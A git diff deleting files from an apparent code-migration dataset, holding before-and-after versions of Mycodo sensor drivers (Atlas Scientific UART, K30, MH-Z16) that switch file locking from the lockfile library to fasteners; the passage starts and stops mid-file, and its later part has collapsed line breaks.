-
-            try:
-                while True:
-                    print(device.query("R"))
-                    time.sleep(delay_time - device.long_timeout)
-            except KeyboardInterrupt:  # catch ctrl-c
-                print("Continuous polling stopped")
-
-        # if not a special keyword, pass commands straight to board
-        else:
-            if len(input_str) == 0:
-                print "Please input valid command."
-            else:
-                try:
-                    print(device.query(input_str))
-                except IOError:
-                    print("Query failed \n - Address may be invalid, use "
-                          "List_addr command to see available addresses")
-
-
-if __name__ == "__main__":
-    main()
diff --git a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$devices$atlas_scientific_uart.py.diff b/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$devices$atlas_scientific_uart.py.diff
deleted file mode 100644
index 2b0f09c..0000000
--- a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$devices$atlas_scientific_uart.py.diff
+++ /dev/null
@@ -1,126 +0,0 @@
-diff --git a/mycodo/devices/atlas_scientific_uart.py b/mycodo/devices/atlas_scientific_uart.py
- index a193e1e85f246694defb54c3cfe3ea658368ac3c..547f6d9f22e569007c1066e36ee5142f5e1b533d 100644
- --- a/mycodo/devices/atlas_scientific_uart.py
- +++ b/mycodo/devices/atlas_scientific_uart.py
-@@ -1,19 +1,20 @@
- # coding=utf-8
-+
-+import fasteners
- import logging
- import serial
- import time
--from lockfile import LockFile
- from serial import SerialException
-
- from mycodo.config import ATLAS_PH_LOCK_FILE
-
--logger = logging.getLogger("mycodo.device.atlas_scientific_uart")
--
-
- class AtlasScientificUART:
-     """A Class to communicate with Atlas Scientific sensors via UART"""
-
-     def __init__(self, serial_device, baudrate=9600):
-+        self.logger = logging.getLogger(
-+            "mycodo.device.atlas_scientific_uart_{dev}".format(dev=serial_device))
-         self.setup = True
-         self.serial_device = serial_device
-         try:
-@@ -21,11 +22,11 @@ class AtlasScientificUART:
-                                      baudrate=baudrate,
-                                      timeout=0)
-         except serial.SerialException as err:
--            logger.exception(
-+            self.logger.exception(
-                 "{cls} raised an exception when initializing: "
-                 "{err}".format(cls=type(self).__name__, err=err))
-             self.setup = False
--            logger.exception('Opening serial')
-+            self.logger.exception('Opening serial')
-
-     def read_line(self):
-         """
-@@ -48,29 +49,31 @@ class AtlasScientificUART:
-         """ Send command and return reply """
-         lock_file_amend = '{lf}.{dev}'.format(lf=ATLAS_PH_LOCK_FILE,
-                                               dev=self.serial_device.replace("/", "-"))
--        lock = LockFile(lock_file_amend)
-+
-         try:
--            while not lock.i_am_locking():
--                try:
--                    lock.acquire(timeout=10)  # wait up to 10 seconds before breaking lock
--                except Exception as e:
--                    logger.exception(
--                        "{cls} 10 second timeout, {lock} lock broken: "
--                        "{err}".format(cls=type(self).__name__,
--                                       lock=lock_file_amend,
--                                       err=e))
--                    lock.break_lock()
--                    lock.acquire()
--            self.send_cmd(query_str)
--            time.sleep(1.3)
--            response = self.read_lines()
--            lock.release()
--            return response
-+            lock = fasteners.InterProcessLock(lock_file_amend)
-+            lock_acquired = False
-+
-+            for i in range(600):
-+                lock_acquired = lock.acquire(blocking=False)
-+                if lock_acquired:
-+                    break
-+                else:
-+                    time.sleep(0.1)
-+
-+            if lock_acquired:
-+                self.send_cmd(query_str)
-+                time.sleep(1.3)
-+                response = self.read_lines()
-+                lock.release()
-+                return response
-+            else:
-+                self.logger.error("Could not acquire Atlas UART lock")
-+
-         except Exception as err:
--            logger.exception(
-+            self.logger.exception(
-                 "{cls} raised an exception when taking a reading: "
-                 "{err}".format(cls=type(self).__name__, err=err))
--            lock.release()
-             return None
-
-     def read_lines(self):
-@@ -88,10 +91,10 @@ class AtlasScientificUART:
-             return lines
-
-         except SerialException:
--            logger.exception('Read Lines')
-+            self.logger.exception('Read Lines')
-             return None
-         except AttributeError:
--            logger.exception('UART device not initialized')
-+            self.logger.exception('UART device not initialized')
-             return None
-
-     def send_cmd(self, cmd):
-@@ -106,10 +109,10 @@ class AtlasScientificUART:
-             self.ser.write(buf)
-             return True
-         except SerialException:
--            logger.exception('Send CMD')
-+            self.logger.exception('Send CMD')
-             return None
-         except AttributeError:
--            logger.exception('UART device not initialized')
-+            self.logger.exception('UART device not initialized')
-             return None
-
-
-@@ -134,5 +137,6 @@ def main():
-         except IOError:
-             print("Send command failed\n")
-
-+
- if __name__ == "__main__":
-     main()
diff --git a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$devices$atlas_scientific_uart.py.source.py b/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$devices$atlas_scientific_uart.py.source.py
deleted file mode 100644
index 880bd60..0000000
--- a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$devices$atlas_scientific_uart.py.source.py
+++ /dev/null
@@ -1,138 +0,0 @@
-# coding=utf-8
-import logging
-import serial
-import time
-from lockfile import LockFile
-from serial import SerialException
-
-from mycodo.config import ATLAS_PH_LOCK_FILE
-
-logger = logging.getLogger("mycodo.device.atlas_scientific_uart")
-
-
-class AtlasScientificUART:
-    """A Class to communicate with Atlas Scientific sensors via UART"""
-
-    def __init__(self, serial_device, baudrate=9600):
-        self.setup = True
-        self.serial_device = serial_device
-        try:
-            self.ser = serial.Serial(port=serial_device,
-                                     baudrate=baudrate,
-                                     timeout=0)
-        except serial.SerialException as err:
-            logger.exception(
-                "{cls} raised an exception when initializing: "
-                "{err}".format(cls=type(self).__name__, err=err))
-            self.setup = False
-            logger.exception('Opening serial')
-
-    def read_line(self):
-        """
-        taken from the ftdi library and modified to
-        use the ezo line separator "\r"
-        """
-        lsl = len('\r')
-        line_buffer = []
-        while True:
-            next_char = self.ser.read(1)
-            if next_char == '':
-                break
-            line_buffer.append(next_char)
-            if (len(line_buffer) >= lsl and
-                    line_buffer[-lsl:] == list('\r')):
-                break
-        return ''.join(line_buffer)
-
-    def query(self, query_str):
-        """ Send command and return reply """
-        lock_file_amend = '{lf}.{dev}'.format(lf=ATLAS_PH_LOCK_FILE,
-                                              dev=self.serial_device.replace("/", "-"))
-        lock = LockFile(lock_file_amend)
-        try:
-            while not lock.i_am_locking():
-                try:
-                    lock.acquire(timeout=10)  # wait up to 10 seconds before breaking lock
-                except Exception as e:
-                    logger.exception(
-                        "{cls} 10 second timeout, {lock} lock broken: "
-                        "{err}".format(cls=type(self).__name__,
-                                       lock=lock_file_amend,
-                                       err=e))
-                    lock.break_lock()
-                    lock.acquire()
-            self.send_cmd(query_str)
-            time.sleep(1.3)
-            response = self.read_lines()
-            lock.release()
-            return response
-        except Exception as err:
-            logger.exception(
-                "{cls} raised an exception when taking a reading: "
-                "{err}".format(cls=type(self).__name__, err=err))
-            lock.release()
-            return None
-
-    def read_lines(self):
-        """
-        also taken from ftdi lib to work with modified readline function
-        """
-        lines = []
-        try:
-            while True:
-                line = self.read_line()
-                if not line:
-                    break
-                # self.ser.flush_input()
-                lines.append(line)
-            return lines
-
-        except SerialException:
-            logger.exception('Read Lines')
-            return None
-        except AttributeError:
-            logger.exception('UART device not initialized')
-            return None
-
-    def send_cmd(self, cmd):
-        """
-        Send command to the Atlas Sensor.
-        Before sending, add Carriage Return at the end of the command.
-        :param cmd:
-        :return:
-        """
-        buf = "{cmd}\r".format(cmd=cmd)  # add carriage return
-        try:
-            self.ser.write(buf)
-            return True
-        except SerialException:
-            logger.exception('Send CMD')
-            return None
-        except AttributeError:
-            logger.exception('UART device not initialized')
-            return None
-
-
-def main():
-    device_str = raw_input("Device? (e.g. '/dev/ttyS0'): ")
-    baud_str = raw_input("Baud rate? (e.g. '9600'): ")
-
-    device = AtlasScientificUART(device_str, baudrate=int(baud_str))
-
-    print(">> Atlas Scientific sample code")
-    print(">> Any commands entered are passed to the board via UART")
-    print(">> Pressing ctrl-c will stop the polling")
-
-    while True:
-        input_str = raw_input("Enter command: ")
-
-        if len(input_str) == 0:
-            print "Please input valid command."
-        else:
-            try:
-                print(device.query(input_str))
-            except IOError:
-                print("Send command failed\n")
-
-if __name__ == "__main__":
-    main()
diff --git a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$devices$atlas_scientific_uart.py.target.py b/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$devices$atlas_scientific_uart.py.target.py
deleted file mode 100644
index 5d51f5b..0000000
--- a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$devices$atlas_scientific_uart.py.target.py
+++ /dev/null
@@ -1,142 +0,0 @@
-# coding=utf-8
-
-import fasteners
-import logging
-import serial
-import time
-from serial import SerialException
-
-from mycodo.config import ATLAS_PH_LOCK_FILE
-
-
-class AtlasScientificUART:
-    """A Class to communicate with Atlas Scientific sensors via UART"""
-
-    def __init__(self, serial_device, baudrate=9600):
-        self.logger = logging.getLogger(
-            "mycodo.device.atlas_scientific_uart_{dev}".format(dev=serial_device))
-        self.setup = True
-        self.serial_device = serial_device
-        try:
-            self.ser = serial.Serial(port=serial_device,
-                                     baudrate=baudrate,
-                                     timeout=0)
-        except serial.SerialException as err:
-            self.logger.exception(
-                "{cls} raised an exception when initializing: "
-                "{err}".format(cls=type(self).__name__, err=err))
-            self.setup = False
-            self.logger.exception('Opening serial')
-
-    def read_line(self):
-        """
-        taken from the ftdi library and modified to
-        use the ezo line separator "\r"
-        """
-        lsl = len('\r')
-        line_buffer = []
-        while True:
-            next_char = self.ser.read(1)
-            if next_char == '':
-                break
-            line_buffer.append(next_char)
-            if (len(line_buffer) >= lsl and
-                    line_buffer[-lsl:] == list('\r')):
-                break
-        return ''.join(line_buffer)
-
-    def query(self, query_str):
-        """ Send command and return reply """
-        lock_file_amend = '{lf}.{dev}'.format(lf=ATLAS_PH_LOCK_FILE,
-                                              dev=self.serial_device.replace("/", "-"))
-
-        try:
-            lock = fasteners.InterProcessLock(lock_file_amend)
-            lock_acquired = False
-
-            for i in range(600):
-                lock_acquired = lock.acquire(blocking=False)
-                if lock_acquired:
-                    break
-                else:
-                    time.sleep(0.1)
-
-            if lock_acquired:
-                self.send_cmd(query_str)
-                time.sleep(1.3)
-                response = self.read_lines()
-                lock.release()
-                return response
-            else:
-                self.logger.error("Could not acquire Atlas UART lock")
-
-        except Exception as err:
-            self.logger.exception(
-                "{cls} raised an exception when taking a reading: "
-                "{err}".format(cls=type(self).__name__, err=err))
-            return None
-
-    def read_lines(self):
-        """
-        also taken from ftdi lib to work with modified readline function
-        """
-        lines = []
-        try:
-            while True:
-                line = self.read_line()
-                if not line:
-                    break
-                # self.ser.flush_input()
-                lines.append(line)
-            return lines
-
-        except SerialException:
-            self.logger.exception('Read Lines')
-            return None
-        except AttributeError:
-            self.logger.exception('UART device not initialized')
-            return None
-
-    def send_cmd(self, cmd):
-        """
-        Send command to the Atlas Sensor.
-        Before sending, add Carriage Return at the end of the command.
-        :param cmd:
-        :return:
-        """
-        buf = "{cmd}\r".format(cmd=cmd)  # add carriage return
-        try:
-            self.ser.write(buf)
-            return True
-        except SerialException:
-            self.logger.exception('Send CMD')
-            return None
-        except AttributeError:
-            self.logger.exception('UART device not initialized')
-            return None
-
-
-def main():
-    device_str = raw_input("Device? (e.g. '/dev/ttyS0'): ")
-    baud_str = raw_input("Baud rate? (e.g. '9600'): ")
-
-    device = AtlasScientificUART(device_str, baudrate=int(baud_str))
-
-    print(">> Atlas Scientific sample code")
-    print(">> Any commands entered are passed to the board via UART")
-    print(">> Pressing ctrl-c will stop the polling")
-
-    while True:
-        input_str = raw_input("Enter command: ")
-
-        if len(input_str) == 0:
-            print "Please input valid command."
-        else:
-            try:
-                print(device.query(input_str))
-            except IOError:
-                print("Send command failed\n")
-
-
-if __name__ == "__main__":
-    main()
diff --git a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$k30.py.diff b/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$k30.py.diff
deleted file mode 100644
index cff5b24..0000000
--- a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$k30.py.diff
+++ /dev/null
@@ -1,60 +0,0 @@
-diff --git a/mycodo/sensors/k30.py b/mycodo/sensors/k30.py
- index a193e1e85f246694defb54c3cfe3ea658368ac3c..547f6d9f22e569007c1066e36ee5142f5e1b533d 100644
- --- a/mycodo/sensors/k30.py
- +++ b/mycodo/sensors/k30.py
-@@ -1,6 +1,6 @@
- # coding=utf-8
-
--from lockfile import LockFile
-+import fasteners
- import logging
- import serial
- import time
-@@ -92,30 +92,29 @@ class K30Sensor(AbstractSensor):
-         if not self.serial_device:  # Don't measure if device isn't validated
-             return None
-
--        lock = LockFile(self.k30_lock_file)
-         try:
--            # Acquire lock on K30 to ensure more than one read isn't
--            # being attempted at once.
--            while not lock.i_am_locking():
--                try:  # wait 60 seconds before breaking lock
--                    lock.acquire(timeout=60)
--                except Exception as e:
--                    self.logger.error(
--                        "{cls} 60 second timeout, {lock} lock broken: "
--                        "{err}".format(
--                            cls=type(self).__name__,
--                            lock=self.k30_lock_file,
--                            err=e))
--                    lock.break_lock()
--                    lock.acquire()
--            self._co2 = self.get_measurement()
--            lock.release()
-+            lock = fasteners.InterProcessLock(self.k30_lock_file)
-+            lock_acquired = False
-+
-+            for i in range(600):
-+                lock_acquired = lock.acquire(blocking=False)
-+                if lock_acquired:
-+                    break
-+                else:
-+                    time.sleep(0.1)
-+
-+            if lock_acquired:
-+                self._co2 = self.get_measurement()
-+                lock.release()
-+            else:
-+                self.logger.error("Could not acquire K30 lock")
-+
-         if self._co2 is None:
-             return 1
-         return  # success - no errors
-+
-         except Exception as e:
-             self.logger.error(
-                 "{cls} raised an exception when taking a reading: "
-                 "{err}".format(cls=type(self).__name__, err=e))
--            lock.release()
-             return 1
diff --git a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$k30.py.source.py b/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$k30.py.source.py
deleted file mode 100644
index 29769e6..0000000
--- a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$k30.py.source.py
+++ /dev/null
@@ -1,121 +0,0 @@
-# coding=utf-8
-
-from lockfile import LockFile
-import logging
-import serial
-import time
-from .base_sensor import AbstractSensor
-
-from sensorutils import is_device
-
-
-class K30Sensor(AbstractSensor):
-    """ A sensor support class that monitors the K30's CO2 concentration """
-
-    def __init__(self, device_loc, baud_rate=9600):
-        super(K30Sensor, self).__init__()
-        self.logger = logging.getLogger(
-            "mycodo.sensors.k30.{dev}".format(dev=device_loc.replace('/', '')))
-        self.k30_lock_file = None
-        self._co2 = 0
-
-        # Check if device is valid
-        self.serial_device = is_device(device_loc)
-        if self.serial_device:
-            try:
-                self.ser = serial.Serial(self.serial_device,
-                                         baudrate=baud_rate,
-                                         timeout=1)
-                self.k30_lock_file = "/var/lock/sen-k30-{}".format(device_loc.replace('/', ''))
-            except serial.SerialException:
-                self.logger.exception('Opening serial')
-        else:
-            self.logger.error(
-                'Could not open "{dev}". '
-                'Check the device location is correct.'.format(
-                    dev=device_loc))
-
-    def __repr__(self):
-        """ Representation of object """
-        return "<{cls}(co2={co2})>".format(
-            cls=type(self).__name__,
-            co2="{0:.2f}".format(self._co2))
-
-    def __str__(self):
-        """ Return CO2 information """
-        return "CO2: {co2}".format(co2="{0:.2f}".format(self._co2))
-
-    def __iter__(self):  # must return an iterator
-        """ K30 iterates through live CO2 readings """
-        return self
-
-    def next(self):
-        """ Get next CO2 reading """
-        if self.read():  # raised an error
-            raise StopIteration  # required
-        return dict(co2=float('{0:.2f}'.format(self._co2)))
-
-    def info(self):
-        conditions_measured = [
-            ("CO2", "co2", "float", "0.00", self._co2, self.co2)
-        ]
-        return conditions_measured
-
-    @property
-    def co2(self):
-        """ CO2 concentration in ppmv """
-        if not self._co2:  # update if needed
-            self.read()
-        return self._co2
-
-    def get_measurement(self):
-        """ Gets the K30's CO2 concentration in ppmv via UART"""
-        self._co2 = None
-        self.ser.flushInput()
-        time.sleep(1)
-        self.ser.write("\xFE\x44\x00\x08\x02\x9F\x25")
-        time.sleep(.01)
-        resp = self.ser.read(7)
-        if len(resp) != 0:
-            high = ord(resp[3])
-            low = ord(resp[4])
-            co2 = (high * 256) + low
-            return co2
-        return None
-
-    def read(self):
-        """
-        Takes a reading from the K30 and updates the self._co2 value
-
-        :returns: None on success or 1 on error
-        """
-        if not self.serial_device:  # Don't measure if device isn't validated
-            return None
-
-        lock = LockFile(self.k30_lock_file)
-        try:
-            # Acquire lock on K30 to ensure more than one read isn't
-            # being attempted at once.
-            while not lock.i_am_locking():
-                try:  # wait 60 seconds before breaking lock
-                    lock.acquire(timeout=60)
-                except Exception as e:
-                    self.logger.error(
-                        "{cls} 60 second timeout, {lock} lock broken: "
-                        "{err}".format(
-                            cls=type(self).__name__,
-                            lock=self.k30_lock_file,
-                            err=e))
-                    lock.break_lock()
-                    lock.acquire()
-            self._co2 = self.get_measurement()
-            lock.release()
-            if self._co2 is None:
-                return 1
-            return  # success - no errors
-        except Exception as e:
-            self.logger.error(
-                "{cls} raised an exception when taking a reading: "
-                "{err}".format(cls=type(self).__name__, err=e))
-            lock.release()
-            return 1
diff --git a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$k30.py.target.py b/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$k30.py.target.py
deleted file mode 100644
index badc8c0..0000000
--- a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$k30.py.target.py
+++ /dev/null
@@ -1,120 +0,0 @@
-# coding=utf-8
-
-import fasteners
-import logging
-import serial
-import time
-from .base_sensor import AbstractSensor
-
-from sensorutils import is_device
-
-
-class K30Sensor(AbstractSensor):
-    """ A sensor support class that monitors the K30's CO2 concentration """
-
-    def __init__(self, device_loc, baud_rate=9600):
-        super(K30Sensor, self).__init__()
-        self.logger = logging.getLogger(
-            "mycodo.sensors.k30.{dev}".format(dev=device_loc.replace('/', '')))
-        self.k30_lock_file = None
-        self._co2 = 0
-
-        # Check if device is valid
-        self.serial_device = is_device(device_loc)
-        if self.serial_device:
-            try:
-                self.ser = serial.Serial(self.serial_device,
-                                         baudrate=baud_rate,
-                                         timeout=1)
-                self.k30_lock_file = "/var/lock/sen-k30-{}".format(device_loc.replace('/', ''))
-            except serial.SerialException:
-                self.logger.exception('Opening serial')
-        else:
-            self.logger.error(
-                'Could not open "{dev}". '
-                'Check the device location is correct.'.format(
-                    dev=device_loc))
-
-    def __repr__(self):
-        """ Representation of object """
-        return "<{cls}(co2={co2})>".format(
-            cls=type(self).__name__,
-            co2="{0:.2f}".format(self._co2))
-
-    def __str__(self):
-        """ Return CO2 information """
-        return "CO2: {co2}".format(co2="{0:.2f}".format(self._co2))
-
-    def __iter__(self):  # must return an iterator
-        """ K30 iterates through live CO2 readings """
-        return self
-
-    def next(self):
-        """ Get next CO2 reading """
-        if self.read():  # raised an error
-            raise StopIteration  # required
-        return dict(co2=float('{0:.2f}'.format(self._co2)))
-
-    def info(self):
-        conditions_measured = [
-            ("CO2", "co2", "float", "0.00", self._co2, self.co2)
-        ]
-        return conditions_measured
-
-    @property
-    def co2(self):
-        """ CO2 concentration in ppmv """
-        if not self._co2:  # update if needed
-            self.read()
-        return self._co2
-
-    def get_measurement(self):
-        """ Gets the K30's CO2 concentration in ppmv via UART"""
-        self._co2 = None
-        self.ser.flushInput()
-        time.sleep(1)
-        self.ser.write("\xFE\x44\x00\x08\x02\x9F\x25")
-        time.sleep(.01)
-        resp = self.ser.read(7)
-        if len(resp) != 0:
-            high = ord(resp[3])
-            low = ord(resp[4])
-            co2 = (high * 256) + low
-            return co2
-        return None
-
-    def read(self):
-        """
-        Takes a reading from the K30 and updates the self._co2 value
-
-        :returns: None on success or 1 on error
-        """
-        if not self.serial_device:  # Don't measure if device isn't validated
-            return None
-
-        try:
-            lock = fasteners.InterProcessLock(self.k30_lock_file)
-            lock_acquired = False
-
-            for i in range(600):
-                lock_acquired = lock.acquire(blocking=False)
-                if lock_acquired:
-                    break
-                else:
-                    time.sleep(0.1)
-
-            if lock_acquired:
-                self._co2 = self.get_measurement()
-                lock.release()
-            else:
-                self.logger.error("Could not acquire K30 lock")
-
-            if self._co2 is None:
-                return 1
-            return  # success - no errors
-
-        except Exception as e:
-            self.logger.error(
-                "{cls} raised an exception when taking a reading: "
-                "{err}".format(cls=type(self).__name__, err=e))
-            return 1
diff --git a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$mh_z16.py.diff b/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$mh_z16.py.diff
deleted file mode 100644
index 89cbb09..0000000
--- a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$mh_z16.py.diff
+++ /dev/null
@@ -1,77 +0,0 @@
-diff --git a/mycodo/sensors/mh_z16.py b/mycodo/sensors/mh_z16.py
- index a193e1e85f246694defb54c3cfe3ea658368ac3c..547f6d9f22e569007c1066e36ee5142f5e1b533d 100644
- --- a/mycodo/sensors/mh_z16.py
- +++ b/mycodo/sensors/mh_z16.py
-@@ -19,7 +19,7 @@
- # The above copyright notice and this permission notice shall be
- # included in all copies or substantial portions of the Software.
- --from lockfile import LockFile -+import fasteners - import logging - import serial - import smbus -@@ -36,7 +36,7 @@ class MHZ16Sensor(AbstractSensor): - def __init__(self, interface, device_loc=None, baud_rate=None, - i2c_address=None, i2c_bus=None): - super(MHZ16Sensor, self).__init__() -- self.k30_lock_file = None -+ self.mhz16_lock_file = None - self._co2 = 0 - self.interface = interface - -@@ -47,8 +47,7 @@ class MHZ16Sensor(AbstractSensor): - self.serial_device = is_device(device_loc) - if self.serial_device: - try: -- self.k30_lock_file = "/var/lock/sen-mhz16-{}".format(device_loc.replace('/', '')) -- self.lock = LockFile(self.k30_lock_file) -+ self.mhz16_lock_file = "/var/lock/sen-mhz16-{}".format(device_loc.replace('/', '')) - self.ser = serial.Serial(self.serial_device, - baudrate=baud_rate, - timeout=1) -@@ -150,20 +149,21 @@ class MHZ16Sensor(AbstractSensor): - - # Acquire lock on MHZ16 to ensure more than one read isn't - # being attempted at once on the same interface -- while not self.lock.i_am_locking(): -- try: # wait 60 seconds before breaking lock -- self.lock.acquire(timeout=60) -- except Exception as e: -- self.logger.error( -- "{cls} 60 second timeout, {lock} lock broken: " -- "{err}".format( -- cls=type(self).__name__, -- lock=self.k30_lock_file, -- err=e)) -- self.lock.break_lock() -- self.lock.acquire() -- self._co2 = self.get_measurement() -- self.lock.release() -+ lock = fasteners.InterProcessLock(self.mhz16_lock_file) -+ lock_acquired = False -+ -+ for i in range(600): -+ lock_acquired = lock.acquire(blocking=False) -+ if lock_acquired: -+ break -+ else: -+ time.sleep(0.1) -+ -+ if lock_acquired: -+ self._co2 = self.get_measurement() -+ lock.release() -+ else: -+ self.logger.error("Could not acquire MHZ16 lock") - - elif self.interface == 'I2C': - self._co2 = self.get_measurement() -@@ -176,8 +176,6 @@ class MHZ16Sensor(AbstractSensor): - self.logger.error( - "{cls} raised an exception when taking a reading: " - "{err}".format(cls=type(self).__name__, err=e)) -- if self.interface == 'UART': -- self.lock.release() - return 1 - - def begin(self): diff --git a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$mh_z16.py.source.py b/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$mh_z16.py.source.py deleted file mode 100644 index e8d2b53..0000000 --- a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$mh_z16.py.source.py +++ /dev/null @@ -1,240 +0,0 @@ -# coding=utf-8 - -# I2C code created in part by: -# Author: Tiequan Shao (info@sandboxelectronics.com) -# License: CC BY-NC-SA 3.0 -# -# UART Code created in part by: -# Author: Zion Orent -# Copyright (c) 2015 Intel Corporation. -# -# Permission is hereby granted, free of charge, to any person obtaining -# a copy of this software and associated documentation files (the -# "Software"), to deal in the Software without restriction, including -# without limitation the rights to use, copy, modify, merge, publish, -# distribute, sublicense, and/or sell copies of the Software, and to -# permit persons to whom the Software is furnished to do so, subject to -# the following conditions: -# -# The above copyright notice and this permission notice shall be -# included in all copies or substantial portions of the Software. 
- -from lockfile import LockFile -import logging -import serial -import smbus -import struct -import time -from .base_sensor import AbstractSensor - -from sensorutils import is_device - - -class MHZ16Sensor(AbstractSensor): - """ A sensor support class that monitors the MH-Z16's CO2 concentration """ - - def __init__(self, interface, device_loc=None, baud_rate=None, - i2c_address=None, i2c_bus=None): - super(MHZ16Sensor, self).__init__() - self.k30_lock_file = None - self._co2 = 0 - self.interface = interface - - if self.interface == 'UART': - self.logger = logging.getLogger( - "mycodo.sensors.mhz16.{dev}".format(dev=device_loc.replace('/', ''))) - # Check if device is valid - self.serial_device = is_device(device_loc) - if self.serial_device: - try: - self.k30_lock_file = "/var/lock/sen-mhz16-{}".format(device_loc.replace('/', '')) - self.lock = LockFile(self.k30_lock_file) - self.ser = serial.Serial(self.serial_device, - baudrate=baud_rate, - timeout=1) - except serial.SerialException: - self.logger.exception('Opening serial') - else: - self.logger.error( - 'Could not open "{dev}". ' - 'Check the device location is correct.'.format( - dev=device_loc)) - - elif self.interface == 'I2C': - self.logger = logging.getLogger( - "mycodo.sensors.mhz16.{dev}".format(dev=i2c_address)) - self.cmd_measure = [0xFF, 0x01, 0x9C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x63] - self.IOCONTROL = 0X0E << 3 - self.FCR = 0X02 << 3 - self.LCR = 0X03 << 3 - self.DLL = 0x00 << 3 - self.DLH = 0X01 << 3 - self.THR = 0X00 << 3 - self.RHR = 0x00 << 3 - self.TXLVL = 0X08 << 3 - self.RXLVL = 0X09 << 3 - self.i2c_address = i2c_address - self.i2c = smbus.SMBus(i2c_bus) - self.begin() - - def __repr__(self): - """ Representation of object """ - return "<{cls}(co2={co2})>".format( - cls=type(self).__name__, - co2="{0:.2f}".format(self._co2)) - - def __str__(self): - """ Return CO2 information """ - return "CO2: {co2}".format(co2="{0:.2f}".format(self._co2)) - - def __iter__(self): # must return an iterator - """ MH-Z16 iterates through live CO2 readings """ - return self - - def next(self): - """ Get next CO2 reading """ - if self.read(): # raised an error - raise StopIteration # required - return dict(co2=float('{0:.2f}'.format(self._co2))) - - def info(self): - conditions_measured = [ - ("CO2", "co2", "float", "0.00", self._co2, self.co2) - ] - return conditions_measured - - @property - def co2(self): - """ CO2 concentration in ppmv """ - if not self._co2: # update if needed - self.read() - return self._co2 - - def get_measurement(self): - """ Gets the MH-Z16's CO2 concentration in ppmv via UART""" - self._co2 = None - - if self.interface == 'UART': - self.ser.flushInput() - time.sleep(1) - self.ser.write("\xff\x01\x86\x00\x00\x00\x00\x00\x79") - time.sleep(.01) - resp = self.ser.read(9) - if len(resp) != 0: - high_level = struct.unpack('B', resp[2])[0] - low_level = struct.unpack('B', resp[3])[0] - co2 = high_level * 256 + low_level - return co2 - - elif self.interface == 'I2C': - self.write_register(self.FCR, 0x07) - self.send(self.cmd_measure) - try: - co2 = self.parse(self.receive()) - except Exception: - co2 = None - return co2 - - return None - - def read(self): - """ - Takes a reading from the MH-Z16 and updates the self._co2 value - - :returns: None on success or 1 on error - """ - try: - if self.interface == 'UART': - if not self.serial_device: # Don't measure if device isn't validated - return None - - # Acquire lock on MHZ16 to ensure more than one read isn't - # being attempted at once on the same interface - while 
not self.lock.i_am_locking(): - try: # wait 60 seconds before breaking lock - self.lock.acquire(timeout=60) - except Exception as e: - self.logger.error( - "{cls} 60 second timeout, {lock} lock broken: " - "{err}".format( - cls=type(self).__name__, - lock=self.k30_lock_file, - err=e)) - self.lock.break_lock() - self.lock.acquire() - self._co2 = self.get_measurement() - self.lock.release() - - elif self.interface == 'I2C': - self._co2 = self.get_measurement() - - if self._co2 is None: - return 1 - return # success - no errors - - except Exception as e: - self.logger.error( - "{cls} raised an exception when taking a reading: " - "{err}".format(cls=type(self).__name__, err=e)) - if self.interface == 'UART': - self.lock.release() - return 1 - - def begin(self): - try: - self.write_register(self.IOCONTROL, 0x08) - except IOError: - pass - - self.write_register(self.FCR, 0x07) - self.write_register(self.LCR, 0x83) - self.write_register(self.DLL, 0x60) - self.write_register(self.DLH, 0x00) - self.write_register(self.LCR, 0x03) - - @staticmethod - def parse(response): - checksum = 0 - - if len(response) < 9: - return None - - for i in range(0, 9): - checksum += response[i] - - if response[0] == 0xFF: - if response[1] == 0x9C: - if checksum % 256 == 0xFF: - return (response[2] << 24) + (response[3] << 16) + (response[4] << 8) + response[5] - - return None - - def read_register(self, reg_addr): - time.sleep(0.01) - return self.i2c.read_byte_data(self.i2c_address, reg_addr) - - def write_register(self, reg_addr, val): - time.sleep(0.01) - self.i2c.write_byte_data(self.i2c_address, reg_addr, val) - - def send(self, command): - if self.read_register(self.TXLVL) >= len(command): - self.i2c.write_i2c_block_data(self.i2c_address, self.THR, command) - - def receive(self): - n = 9 - buf = [] - start = time.clock() - - while n > 0: - rx_level = self.read_register(self.RXLVL) - - if rx_level > n: - rx_level = n - - buf.extend(self.i2c.read_i2c_block_data(self.i2c_address, self.RHR, rx_level)) - n = n - rx_level - - if time.clock() - start > 0.2: - break - return buf \ No newline at end of file diff --git a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$mh_z16.py.target.py b/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$mh_z16.py.target.py deleted file mode 100644 index 511486a..0000000 --- a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$mh_z16.py.target.py +++ /dev/null @@ -1,238 +0,0 @@ -# coding=utf-8 - -# I2C code created in part by: -# Author: Tiequan Shao (info@sandboxelectronics.com) -# License: CC BY-NC-SA 3.0 -# -# UART Code created in part by: -# Author: Zion Orent -# Copyright (c) 2015 Intel Corporation. -# -# Permission is hereby granted, free of charge, to any person obtaining -# a copy of this software and associated documentation files (the -# "Software"), to deal in the Software without restriction, including -# without limitation the rights to use, copy, modify, merge, publish, -# distribute, sublicense, and/or sell copies of the Software, and to -# permit persons to whom the Software is furnished to do so, subject to -# the following 